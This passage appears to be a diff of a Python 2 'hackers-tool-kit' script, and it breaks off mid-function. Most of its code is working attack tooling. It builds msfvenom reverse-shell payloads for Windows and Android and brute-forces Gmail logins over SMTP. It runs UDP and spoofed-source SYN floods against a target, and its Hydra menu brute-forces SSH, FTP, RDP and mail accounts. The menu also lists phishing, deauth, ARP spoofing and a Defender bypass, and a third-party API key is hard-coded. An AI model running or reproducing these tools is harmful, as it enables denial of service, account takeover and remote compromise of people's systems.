webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - 